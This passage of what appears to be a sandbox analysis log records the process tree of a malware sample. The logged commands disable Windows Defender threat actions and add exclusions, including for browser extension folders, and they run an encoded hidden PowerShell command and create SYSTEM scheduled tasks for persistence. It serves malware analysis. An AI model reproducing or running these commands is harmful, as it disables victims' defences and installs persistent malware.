C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
- System Location Discovery: System Language Discovery
PID:6884
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4600
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:6992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:6572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:6780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:7024
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4512
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:5364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:6720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5624
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:6608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5112
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2816
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IVXJHHwxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IVXJHHwxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\diQlGCRAlXUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\diQlGCRAlXUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kQokkiROKClU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\kQokkiROKClU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sRttwJAzBjgOcZSSoKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sRttwJAzBjgOcZSSoKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tbxYgFChayZpC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tbxYgFChayZpC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\tezRstjyrBFvpGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\tezRstjyrBFvpGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hcElMiFpmjRItUnRc\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\hcElMiFpmjRItUnRc\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\iZuBgNHIlvMmKgFG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\iZuBgNHIlvMmKgFG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1548 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IVXJHHwxU" /t REG_DWORD /d 0 /reg:323⤵PID:2096
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IVXJHHwxU" /t REG_DWORD /d 0 /reg:324⤵PID:4652
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IVXJHHwxU" /t REG_DWORD /d 0 /reg:643⤵PID:6320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\diQlGCRAlXUn" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\diQlGCRAlXUn" /t REG_DWORD /d 0 /reg:643⤵PID:6232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kQokkiROKClU2" /t REG_DWORD /d 0 /reg:323⤵PID:5140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kQokkiROKClU2" /t REG_DWORD /d 0 /reg:643⤵PID:5156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sRttwJAzBjgOcZSSoKR" /t REG_DWORD /d 0 /reg:323⤵PID:4412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sRttwJAzBjgOcZSSoKR" /t REG_DWORD /d 0 /reg:643⤵PID:6120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tbxYgFChayZpC" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:6476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tbxYgFChayZpC" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:6360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\tezRstjyrBFvpGVB /t REG_DWORD /d 0 /reg:323⤵PID:6932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\tezRstjyrBFvpGVB /t REG_DWORD /d 0 /reg:643⤵PID:6052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2244
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hcElMiFpmjRItUnRc /t REG_DWORD /d 0 /reg:323⤵PID:3736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\hcElMiFpmjRItUnRc /t REG_DWORD /d 0 /reg:643⤵PID:4996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\iZuBgNHIlvMmKgFG /t REG_DWORD /d 0 /reg:323⤵PID:6692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\iZuBgNHIlvMmKgFG /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1800
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grSiqwvcF" /SC once /ST 10:34:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grSiqwvcF"2⤵PID:7036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grSiqwvcF"2⤵
- System Location Discovery: System Language Discovery
PID:2456
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gUpAWMBmNiRXIveoE" /SC once /ST 07:55:50 /RU "SYSTEM" /TR "\"C:\Windows\Temp\iZuBgNHIlvMmKgFG\UkdCTUXIpjDQCPe\qbNQbLf.exe\" fk /VxlodidgG 385104 /S" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:6940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gUpAWMBmNiRXIveoE"2⤵PID:2308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 14842⤵
- Program crash
PID:6668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:328
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4876
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4576
-
C:\Windows\Temp\iZuBgNHIlvMmKgFG\UkdCTUXIpjDQCPe\qbNQbLf.exeC:\Windows\Temp\iZuBgNHIlvMmKgFG\UkdCTUXIpjDQCPe\qbNQbLf.exe fk /VxlodidgG 385104 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5148
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3976 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:720 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2376
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:6364 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:4992
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:340
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:3036 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
- System Location Discovery: System Language Discovery
PID:3256 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:6236
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
PID:6356 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:3736
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:4996
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
PID:668 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:6204
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5820 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
- System Location Discovery: System Language Discovery
PID:6428
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvuqyuXCqiBajvTxPj"2⤵
- System Location Discovery: System Language Discovery
PID:6828
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:2044
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
- Indirect Command Execution
PID:864 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6704 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5632
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IVXJHHwxU\uIQjuz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "MDoEXiFvBoIhYmI" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:5828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MDoEXiFvBoIhYmI2" /F /xml "C:\Program Files (x86)\IVXJHHwxU\dGvKcKe.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:404
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "MDoEXiFvBoIhYmI"2⤵
- System Location Discovery: System Language Discovery
PID:5336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MDoEXiFvBoIhYmI"2⤵
- System Location Discovery: System Language Discovery
PID:1648
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IghYZacgOgkaKW" /F /xml "C:\Program Files (x86)\kQokkiROKClU2\pgSXKxC.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:2956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kLufPdrGBQxyi2" /F /xml "C:\ProgramData\tezRstjyrBFvpGVB\rXmPQrg.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:6468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IMtdedXmPWTYKzUuh2" /F /xml "C:\Program Files (x86)\sRttwJAzBjgOcZSSoKR\edVErNl.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5440
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uIdDIDYcNThKCubECuE2" /F /xml "C:\Program Files (x86)\tbxYgFChayZpC\TcseNYZ.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WPyIipzOlDVAisIbv" /SC once /ST 04:57:40 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\iZuBgNHIlvMmKgFG\zCMtopVu\IzXDBDZ.dll\",#1 /QALqdidVYLF 385104" /V1 /F2⤵
- Drops file in Windows directory
